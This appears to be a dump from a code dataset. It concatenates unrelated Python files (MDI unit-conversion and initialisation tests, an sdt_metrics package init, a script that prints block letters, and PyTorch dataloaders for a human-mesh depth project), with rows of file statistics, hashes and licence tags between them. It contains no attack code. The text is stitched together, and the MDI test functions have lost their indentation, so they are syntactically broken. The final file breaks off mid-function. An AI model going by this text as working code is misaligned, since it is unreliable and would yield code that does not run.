assert mdi.MDI_Conversion_Factor("kilojoule_per_mol", "atomic_unit_of_energy") == pytest.approx(1.0 / 2625.4996382852164)
assert mdi.MDI_Conversion_Factor("rydberg", "atomic_unit_of_energy") == pytest.approx(0.5)
# Test all force conversions
assert mdi.MDI_Conversion_Factor("atomic_unit_of_force", "atomic_unit_of_force") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_force", "newton") == pytest.approx(3.753838631429819e-15)
assert mdi.MDI_Conversion_Factor("newton", "atomic_unit_of_force") == pytest.approx(1.0 / 3.753838631429819e-15)
assert mdi.MDI_Conversion_Factor("newton", "newton") == pytest.approx(1.0)
# Test some length conversions
assert mdi.MDI_Conversion_Factor("atomic_unit_of_length", "angstrom") == pytest.approx(0.52917721067)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_length", "atomic_unit_of_length") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_length", "bohr") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_length", "meter") == pytest.approx(5.29177210903e-11)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_length", "nanometer") == pytest.approx(5.29177210903e-2)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_length", "picometer") == pytest.approx(5.29177210903e+1)
assert mdi.MDI_Conversion_Factor("angstrom", "atomic_unit_of_length") == pytest.approx(1.0 / 0.52917721067)
assert mdi.MDI_Conversion_Factor("bohr", "atomic_unit_of_length") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("meter", "atomic_unit_of_length") == pytest.approx(1.0 / 5.29177210903e-11)
assert mdi.MDI_Conversion_Factor("nanometer", "atomic_unit_of_length") == pytest.approx(1.0 / 5.29177210903e-2)
assert mdi.MDI_Conversion_Factor("picometer", "atomic_unit_of_length") == pytest.approx(1.0 / 5.29177210903e+1)
# Test all mass conversions
assert mdi.MDI_Conversion_Factor("atomic_unit_of_mass", "atomic_unit_of_mass") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_mass", "kilogram") == pytest.approx(9.10938356e-31)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_mass", "gram") == pytest.approx(9.10938356e-28)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_mass", "atomic_mass_unit") == pytest.approx(0.0005485799093287202)
assert mdi.MDI_Conversion_Factor("kilogram", "atomic_unit_of_mass") == pytest.approx(1.0 / 9.10938356e-31)
assert mdi.MDI_Conversion_Factor("kilogram", "kilogram") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("kilogram", "gram") == pytest.approx(1000.0)
assert mdi.MDI_Conversion_Factor("kilogram", "atomic_mass_unit") == pytest.approx(6.022140858549162e+26)
assert mdi.MDI_Conversion_Factor("gram", "atomic_unit_of_mass") == pytest.approx(1.0 / 9.10938356e-28)
assert mdi.MDI_Conversion_Factor("gram", "kilogram") == pytest.approx(0.001)
assert mdi.MDI_Conversion_Factor("gram", "gram") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("gram", "atomic_mass_unit") == pytest.approx(6.0221408585491626e+23)
assert mdi.MDI_Conversion_Factor("atomic_mass_unit", "atomic_unit_of_mass") == pytest.approx(1.0 / 0.0005485799093287202)
assert mdi.MDI_Conversion_Factor("atomic_mass_unit", "kilogram") == pytest.approx(1.66053904e-27)
assert mdi.MDI_Conversion_Factor("atomic_mass_unit", "gram") == pytest.approx(1.66053904e-24)
assert mdi.MDI_Conversion_Factor("atomic_mass_unit", "atomic_mass_unit") == pytest.approx(1.0)
# Test all time conversions
assert mdi.MDI_Conversion_Factor("atomic_unit_of_time", "atomic_unit_of_time") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_time", "picosecond") == pytest.approx(2.4188843265857007e-05)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_time", "second") == pytest.approx(2.4188843265857007e-17)
assert mdi.MDI_Conversion_Factor("picosecond", "atomic_unit_of_time") == pytest.approx(1.0 / 2.4188843265857007e-05)
assert mdi.MDI_Conversion_Factor("picosecond", "picosecond") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("picosecond", "second") == pytest.approx(1.0e-12)
assert mdi.MDI_Conversion_Factor("second", "atomic_unit_of_time") == pytest.approx(1.0 / 2.4188843265857007e-17)
assert mdi.MDI_Conversion_Factor("second", "picosecond") == pytest.approx(1.0e+12)
assert mdi.MDI_Conversion_Factor("second", "second") == pytest.approx(1.0)
# Test exceptions for unrecognized units
    with pytest.raises(Exception):
        mdi.MDI_Conversion_Factor("fake_unit", "bohr")
    with pytest.raises(Exception):
        mdi.MDI_Conversion_Factor("angstrom", "")
    # Test exceptions for inconsistent unit types
    with pytest.raises(Exception):
        mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "atomic_unit_of_time")
    with pytest.raises(Exception):
        mdi.MDI_Conversion_Factor("meter", "calorie")
##########################
#       Error Tests      #
##########################
def test_uninitialized():
comm = mdi.MDI_NULL_COMM
# Test exceptions when MDI is not initialized
with pytest.raises(Exception):
mdi.MDI_Accept_Communicator()
with pytest.raises(Exception):
mdi.MDI_Send([1, 2], 2, mdi.MDI_INT, comm)
with pytest.raises(Exception):
mdi.MDI_Recv(2, mdi.MDI_INT, comm)
with pytest.raises(Exception):
mdi.MDI_Send_Command("<VERSION", comm)
with pytest.raises(Exception):
mdi.MDI_Recv_Command(comm)
with pytest.raises(Exception):
mdi.MDI_Register_Node("TESTNODE")
with pytest.raises(Exception):
mdi.MDI_Check_Node_Exists("TESTNODE", comm)
with pytest.raises(Exception):
mdi.MDI_Get_Node(0, comm, "TESTNODE")
with pytest.raises(Exception):
mdi.MDI_Get_NNodes(comm)
with pytest.raises(Exception):
mdi.MDI_Get_Node(0, comm)
with pytest.raises(Exception):
mdi.MDI_Register_Command("TESTNODE", "TESTCOMM")
with pytest.raises(Exception):
mdi.MDI_Check_Command_Exists("TESTNODE", "TESTCOMM", comm)
with pytest.raises(Exception):
mdi.MDI_Get_NCommands("TESTNODE", comm)
with pytest.raises(Exception):
mdi.MDI_Get_Command("TESTNODE", 0, comm)
with pytest.raises(Exception):
mdi.MDI_Register_Callback("TESTNODE", "TESTCALL")
with pytest.raises(Exception):
mdi.MDI_Check_Callback_Exists("TESTNODE", "TESTCALL", comm)
with pytest.raises(Exception):
mdi.MDI_Get_NCallbacks("TESTNODE", comm)
with pytest.raises(Exception):
mdi.MDI_Get_Callback("TESTNODE", 0, comm)
def test_test_method():
# run the calculation
driver_proc = subprocess.Popen([sys.executable, "../build/ut_tmethod.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Cannot register node name with length greater than MDI_COMMAND_LENGTH
Node name is greater than MDI_COMMAND_LENGTH
Vector accessed out-of-bounds
MDI_Get_Node unable to find node
Node name is greater than MDI_COMMAND_LENGTH
Cannot check command name with length greater than MDI_COMMAND_LENGTH
Could not find the node
Node name is greater than MDI_COMMAND_LENGTH
Could not find the node
MDI_Get_Command could not find the requested node
MDI_Get_Command failed because the command does not exist
Node name is greater than MDI_COMMAND_LENGTH
Cannot check callback name with length greater than MDI_COMMAND_LENGTH
Could not find the node
Node name is greater than MDI_COMMAND_LENGTH
Could not find the node
MDI_Get_Command could not find the requested node
MDI_Get_Command failed because the command does not exist
"""
assert driver_err == expected_err
assert driver_out == ""
def test_init_errors():
# Test running with no -method option
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_no_method.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = ""
assert driver_err == expected_err
assert driver_out == ""
# Test running with no -name option
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_no_name.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: -name option not provided
"""
assert driver_err == expected_err
assert driver_out == ""
# Test running with no -role option
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_no_role.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: -role option not provided
"""
assert driver_err == expected_err
assert driver_out == ""
# Test running with no -port option for a DRIVER using TCP
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_no_port_d.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: -port option not provided
"""
assert driver_err == expected_err
assert driver_out == ""
# Test running with no -port option for an ENGINE using TCP
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_no_port_e.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: -port option not provided
"""
assert driver_err == expected_err
assert driver_out == ""
# Test running with no -hostname option for an ENGINE using TCP
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_no_hostname.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: -hostname option not provided
"""
assert driver_err == expected_err
assert driver_out == ""
# Test running with a fake option
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_fake_opt.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Unrecognized option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test running with a fake method
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_fake_method.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Method not recognized
"""
assert driver_err == expected_err
assert driver_out == ""
# Test running with a fake role
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_fake_role.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Role not recognized
"""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -role argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_role.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Argument missing from -role option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -method argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_method.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = ""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -name argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_name.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Argument missing from -name option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -hostname argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_hostname.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Argument missing from -hostname option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -port argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_port.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Argument missing from -port option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -out argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_out.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Argument missing from -out option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -driver_name argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_driver_name.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Argument missing from -driver_name option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -_language argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_language.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Argument missing from -_language option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test double initialization
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_double.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """MDI_Init called after MDI was already initialized
"""
assert driver_err == expected_err
assert driver_out == ""
| 44.646861
| 185
| 0.683792
| 5,409
| 39,825
| 4.793123
| 0.053614
| 0.042698
| 0.056931
| 0.06642
| 0.912675
| 0.905423
| 0.891692
| 0.859909
| 0.816092
| 0.746895
| 0
| 0.040668
| 0.192392
| 39,825
| 891
| 186
| 44.69697
| 0.765414
| 0.106918
| 0
| 0.712919
| 0
| 0.00319
| 0.238359
| 0.04628
| 0
| 0
| 0
| 0
| 0.244019
| 1
| 0.043062
| false
| 0
| 0.012759
| 0
| 0.057416
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b71531c40a544879f67af037dc63f3658cb349e8
| 108
|
py
|
Python
|
sdt_metrics/__init__.py
|
bollaking/sdt-metrics
|
2132801c36e69102d5c7a042062ba80535cef0f1
|
[
"BSD-3-Clause"
] | null | null | null |
sdt_metrics/__init__.py
|
bollaking/sdt-metrics
|
2132801c36e69102d5c7a042062ba80535cef0f1
|
[
"BSD-3-Clause"
] | null | null | null |
sdt_metrics/__init__.py
|
bollaking/sdt-metrics
|
2132801c36e69102d5c7a042062ba80535cef0f1
|
[
"BSD-3-Clause"
] | null | null | null |
from .support import *
from .plotting import *
from ._sdt_metrics import *
from ._sdt_metrics import _S
| 21.6
| 29
| 0.75
| 15
| 108
| 5.066667
| 0.466667
| 0.394737
| 0.342105
| 0.526316
| 0.605263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.185185
| 108
| 4
| 30
| 27
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
3fd1c5c4baa65d34af26e01f7c009304540f1897
| 605
|
py
|
Python
|
Initials.py
|
Queen-Jonnie/Work
|
0197644b09700c8ed9576f8270f3f334588cabc9
|
[
"Apache-2.0"
] | null | null | null |
Initials.py
|
Queen-Jonnie/Work
|
0197644b09700c8ed9576f8270f3f334588cabc9
|
[
"Apache-2.0"
] | null | null | null |
Initials.py
|
Queen-Jonnie/Work
|
0197644b09700c8ed9576f8270f3f334588cabc9
|
[
"Apache-2.0"
] | null | null | null |
print("My name is Jessica Bonnie Ayomide")
print("JJJJJJJJJJJJJ BBBBBBBBBB A")
print(" J B B A A")
print(" J B B A A")
print(" J B B A A")
print(" J B B A A")
print(" J BBBBBBBBBB AAAAAAAAAA")
print(" J B B A A")
print(" J B B A A")
print("J J B B A A")
print(" J J B B A A")
print(" JJJJJ BBBBBBBBBB A A")
| 46.538462
| 51
| 0.317355
| 70
| 605
| 2.742857
| 0.2
| 0.28125
| 0.291667
| 0.166667
| 0.489583
| 0.489583
| 0.489583
| 0.489583
| 0.489583
| 0.489583
| 0
| 0
| 0.603306
| 605
| 12
| 52
| 50.416667
| 0.8
| 0
| 0
| 0.666667
| 0
| 0
| 0.797639
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
b7510df03978635b1d1dd94e0cc082003f3aa08e
| 17,418
|
py
|
Python
|
src/data_loader.py
|
Taye310/hmd
|
46d453392213b8ead39f8e850054fc7bbb81146b
|
[
"MIT"
] | null | null | null |
src/data_loader.py
|
Taye310/hmd
|
46d453392213b8ead39f8e850054fc7bbb81146b
|
[
"MIT"
] | null | null | null |
src/data_loader.py
|
Taye310/hmd
|
46d453392213b8ead39f8e850054fc7bbb81146b
|
[
"MIT"
] | null | null | null |
from torch.utils.data.dataset import Dataset
import numpy as np
import PIL.Image
import random
import json
import pickle
import torchvision.transforms as transforms
from utility import center_crop
import os
import cv2
import configparser
conf = configparser.ConfigParser()
conf.read(u'../conf.ini', encoding='utf8')
tgt_path = conf.get('DATA', 'tgt_path')
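# Assumed layout of ../conf.ini, inferred from the conf.get() call above
# (the value shown is only an example):
# [DATA]
# tgt_path = /path/to/hmd_dataset/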
#==============================================================================
# data loader for joint train/test
#==============================================================================
class dataloader_joint(Dataset):
def __init__(self,
sil_ver = False,
train = True,
transform = transforms.Compose([transforms.ToTensor()]),
manual_seed = 1234,
shuffle = True,
get_all = False,
):
if train is True:
self.dataset_dir = tgt_path + "train/"
# self.num = 24149*10 #13938, non dr augment version
self.num = 8035*10
else:
self.dataset_dir = tgt_path + "test/"
self.num = 4625*10
# transfer arg
self.sil_ver = sil_ver
self.transform = transform
self.get_all = get_all
# make random seed
if manual_seed is None:
manual_seed = random.randint(1, 10000)
random.seed(manual_seed)
# make data_id list and shuffle
self.id_list = list(range(self.num))
if shuffle is True:
random.shuffle(self.id_list)
def __len__(self):
return self.num
def __getitem__(self, index):
crt_id = self.id_list[index]
img_id = int(np.floor(crt_id / 10))
joint_id = crt_id % 10
# get sil
all_sil = np.array(PIL.Image.open(self.dataset_dir +
"sil/%08d.png" % img_id))
all_sil[all_sil<128] = 0
all_sil[all_sil>=128] = 255
# get parameters
        with open(self.dataset_dir + "/para/%08d.json" % img_id, 'rb') as fp:
para_dic = json.load(fp)
joint_move = para_dic["joint_move"]
joint_posi = para_dic["joint_posi"]
# make target para
tgt_para = np.array(joint_move[(joint_id*2):(joint_id*2+2)])
if self.sil_ver is False:
# make input array for image version
img_file = para_dic["img_file"]
src_img = np.array(PIL.Image.open(self.dataset_dir + img_file))
src_sil = np.expand_dims(all_sil[:,:,1], 2)
crop_sil = center_crop(src_sil, joint_posi[joint_id], 64)
crop_img = center_crop(src_img, joint_posi[joint_id], 64)
            crop_img = crop_img.astype(int)  # np.int was removed in NumPy >= 1.24
            # normalize colors relative to the crop's center pixel (31, 31)
            crop_img = crop_img - crop_img[31, 31, :]
            crop_img = np.absolute(crop_img)
src_in = np.concatenate((crop_sil, crop_img), axis = 2)
else:
# make input array for silhouette version
src_sil = all_sil[:,:,:2]
src_in = center_crop(src_sil, joint_posi[joint_id], 64)
# transform as torch tensor
src_in = PIL.Image.fromarray(src_in.astype(np.uint8))
        if self.transform is not None:
src_in = self.transform(src_in)
if self.get_all is True and self.sil_ver is False:
# get verts and vert_norms
verts = np.array(para_dic["verts"])
vert_norms = np.array(para_dic["vert_norms"])
proc_para = para_dic["proc_para"]
return (src_in, tgt_para, src_img, verts,
vert_norms, proc_para, all_sil)
else:
return (src_in, tgt_para)
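# Usage sketch (assumes the tgt_path dataset layout above exists):
# from torch.utils.data import DataLoader
# loader = DataLoader(dataloader_joint(train=True, sil_ver=True), batch_size=32)
# src_in, tgt_para = next(iter(loader))  # batched 64x64 crops and 2-D joint moves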
#==============================================================================
# data loader for anchor train/test
#==============================================================================
class dataloader_anchor(Dataset):
def __init__(self,
sil_ver = False,
train = True,
transform = transforms.Compose([transforms.ToTensor()]),
manual_seed = 1234,
shuffle = True,
get_all = False,
):
if train is True:
self.dataset_dir = tgt_path + "train/"
            # self.num = 24149*200 # 13938, non dr augment version
            self.num = 8035*200  # 200 anchors per image, matching the % 200 indexing in __getitem__
else:
self.dataset_dir = tgt_path + "test/"
self.num = 4625*200
# transfer arg
self.sil_ver = sil_ver
self.transform = transform
self.get_all = get_all
# make random seed
if manual_seed is None:
manual_seed = random.randint(1, 10000)
random.seed(manual_seed)
# make data_id list and shuffle
self.id_list = list(range(self.num))
if shuffle is True:
random.shuffle(self.id_list)
def __len__(self):
return self.num
def __getitem__(self, index):
crt_id = self.id_list[index]
img_id = int(np.floor(crt_id / 200))
achr_id = crt_id % 200
# get sil
all_sil = np.array(PIL.Image.open(self.dataset_dir +
"sil/%08d.png" % img_id))
all_sil[all_sil<128] = 0
all_sil[all_sil>=128] = 255
# get parameters
        with open(self.dataset_dir + "/para/%08d.json" % img_id, 'rb') as fp:
para_dic = json.load(fp)
achr_move = np.array(para_dic["achr_move"])
achr_posi = para_dic["achr_posi"]
# get source image
img_file = para_dic["img_file"]
src_img = np.array(PIL.Image.open(self.dataset_dir + img_file))
tgt_para = achr_move[achr_id]
tgt_para = np.expand_dims(tgt_para, 0)
if self.sil_ver is False:
src_sil = np.expand_dims(all_sil[:,:,2], 2)
crop_sil = center_crop(src_sil, achr_posi[achr_id], 32)
crop_img = center_crop(src_img, achr_posi[achr_id], 32)
            crop_img = crop_img.astype(int)  # np.int was removed in NumPy >= 1.24
            # normalize colors relative to the crop's center pixel (15, 15)
            crop_img = crop_img - crop_img[15, 15, :]
crop_img = np.absolute(crop_img)
src_in = np.concatenate((crop_sil, crop_img), axis = 2)
else:
# make input array for silhouette version
src_sil = np.stack((all_sil[:,:,0], all_sil[:,:,2]), axis = -1)
src_in = center_crop(src_sil, achr_posi[achr_id], 32)
# transform as torch tensor
src_in = PIL.Image.fromarray(src_in.astype(np.uint8))
        if self.transform is not None:
src_in = self.transform(src_in)
if self.get_all is True and self.sil_ver is False:
# get verts and vert_norms
verts = np.array(para_dic["verts"])
vert_norms = np.array(para_dic["vert_norms"])
proc_para = para_dic["proc_para"]
return (src_in, tgt_para, src_img, verts,
vert_norms, proc_para, all_sil)
else:
return (src_in, tgt_para)
#==============================================================================
# data loader for shading training/testing
#==============================================================================
class dataloader_shading(Dataset):
def __init__(self,
train = True,
manual_seed = 1234,
shuffle = True,
):
self.depth_gt_dir = "/home/zhangtianyi/ShareFolder/data/hmd_masked/train/complete_depth/"
self.src_img_dir = "/home/zhangtianyi/ShareFolder/data/hmd_2/train/img/"
self.src_img_list = os.listdir(self.src_img_dir)
# self.depth_gt_list = os.listdir(self.depth_gt_dir)
self.num = len(self.src_img_list)
# make random seed
if manual_seed is None:
manual_seed = random.randint(1, 10000)
random.seed(manual_seed)
# make data_id list and shuffle
self.id_list = list(range(self.num))
if shuffle is True:
random.shuffle(self.id_list)
def __len__(self):
return self.num
def __getitem__(self, index):
tuple_id = self.id_list[index]
# get source image
src_img = np.array(PIL.Image.open(self.src_img_dir + self.src_img_list[tuple_id]))
src_img = cv2.resize(src_img, dsize=(448, 448))
src_img = np.rollaxis(src_img, 2, 0) / 255.0
# src_img = np.resize(src_img, (3, 488, 488))
# print(src_img.shape)
# print("src_img_name:",self.src_img_dir + self.src_img_list[tuple_id] + "/std_img.jpg",
# "depth_gt_name:",self.depth_gt_dir + self.src_img_list[tuple_id] + "_depth_mask.npy")
# get gt depth
depth_gt = np.load(self.depth_gt_dir + self.src_img_list[tuple_id][:-4] + "_depth_mask.npy")
# depth_gt = depth_gt
# print("depth_gt path:",self.depth_gt_dir + self.depth_gt_list[tuple_id])
# print(depth_gt[250])
depth_gt = np.expand_dims(depth_gt, 0)
# # get smooth depth
# f_dsm = open(self.dataset_dir + 'smoothD_%04d.bin' % tuple_id, "rb")
# depth_sm = np.resize(np.fromfile(f_dsm, dtype=np.float32),
# (448, 448)).transpose()
# # compute depth difference
# depth_diff = depth_gt - depth_sm
# depth_diff = depth_diff * 10
# depth_diff = np.expand_dims(depth_diff, 0)
# # get mask
# mask = np.zeros(depth_diff.shape)
# mask[depth_diff!=0] = 1
        # build a binary validity mask from the non-zero depth pixels
        temp = depth_gt
        mask = np.zeros(temp.shape)
        mask[temp != 0] = 1
return (src_img, depth_gt, mask)
#==============================================================================
# data loader for efficient predicting test
#==============================================================================
class dataloader_pred(Dataset):
def __init__(self,
train = True,
manual_seed = 1234,
shuffle = True,
dataset_path = None,
):
if dataset_path is None:
dataset_path = tgt_path
if train is True:
self.dataset_dir = dataset_path+"train/"
self.num = 24149 #13938, non dr augment version
else:
self.dataset_dir = dataset_path+"test/"
self.num = 4625
# make random seed
if manual_seed is None:
manual_seed = random.randint(1, 10000)
random.seed(manual_seed)
# make data_id list and shuffle
self.id_list = list(range(self.num))
if shuffle is True:
random.shuffle(self.id_list)
def __len__(self):
return self.num
def __getitem__(self, index):
img_id = self.id_list[index]
# get sil
all_sil = np.array(PIL.Image.open(self.dataset_dir +
"sil/%08d.png" % img_id))
all_sil[all_sil<128] = 0
all_sil[all_sil>=128] = 1
# get parameters
        with open(self.dataset_dir + "/para/%08d.json" % img_id, 'rb') as fp:
para_dic = json.load(fp)
# get src_img and pre-processing parameters
img_file = para_dic["img_file"]
src_img = np.array(PIL.Image.open(self.dataset_dir + img_file))
proc_para = para_dic["proc_para"]
# get verts and vert_norms
verts = np.array(para_dic["verts"])
vert_norms = np.array(para_dic["vert_norms"])
# get joint move and position
joint_move = np.array(para_dic["joint_move"])
joint_posi = para_dic["joint_posi"]
# get anchor move and position
achr_move = np.array(para_dic["achr_move"])
achr_posi = para_dic["achr_posi"]
# make source for joint net
sil_j = np.expand_dims(all_sil[:,:,1], 2)
src_j = np.zeros((10, 4, 64, 64))
for i in range(len(joint_posi)):
crop_sil = center_crop(sil_j, joint_posi[i], 64)
crop_img = center_crop(src_img, joint_posi[i], 64)
            crop_img = crop_img.astype(float)  # np.float was removed in NumPy >= 1.24
            crop_img = crop_img - crop_img[31, 31, :]
crop_img = np.absolute(crop_img)
crop_img = crop_img/255.0
src_j[i,0,:,:] = np.rollaxis(crop_sil, 2, 0)
src_j[i,1:4,:,:] = np.rollaxis(crop_img, 2, 0)
# make source for anchor net
src_a = None
        # commented out because prediction doesn't require this
'''
sil_a = np.stack((all_sil[:,:,0], all_sil[:,:,2]), axis = -1)
src_a = np.zeros((200, 2, 32, 32))
for i in range(len(achr_posi)):
crop_sil = center_crop(sil_a, achr_posi[i], 32)
src_a[i,:,:,:] = np.rollaxis(crop_sil, 2, 0)
'''
return (src_j, src_a, src_img, joint_move, achr_move, verts,
vert_norms, proc_para, all_sil, joint_posi, achr_posi)
#==============================================================================
# data loader for efficient predicting test, sil version
#==============================================================================
class dataloader_sil_pred(Dataset):
def __init__(self,
train = True,
manual_seed = 1234,
shuffle = True,
dataset_path = None,
):
if dataset_path is None:
dataset_path = tgt_path
if train is True:
self.dataset_dir = dataset_path + "train/"
self.num = 24149 #13938, non dr augment version
else:
self.dataset_dir = dataset_path + "test/"
self.num = 4625
# make random seed
if manual_seed is None:
manual_seed = random.randint(1, 10000)
random.seed(manual_seed)
# make data_id list and shuffle
self.id_list = list(range(self.num))
if shuffle is True:
random.shuffle(self.id_list)
def __len__(self):
return self.num
def __getitem__(self, index):
img_id = self.id_list[index]
# get sil
all_sil = np.array(PIL.Image.open(self.dataset_dir +
"sil/%08d.png" % img_id))
all_sil[all_sil<128] = 0
all_sil[all_sil>=128] = 1
# get parameters
        with open(self.dataset_dir + "/para/%08d.json" % img_id, 'rb') as fp:
para_dic = json.load(fp)
# get src_img and pre-processing parameters
img_file = para_dic["img_file"]
src_img = np.array(PIL.Image.open(self.dataset_dir + img_file))
proc_para = para_dic["proc_para"]
# get verts and vert_norms
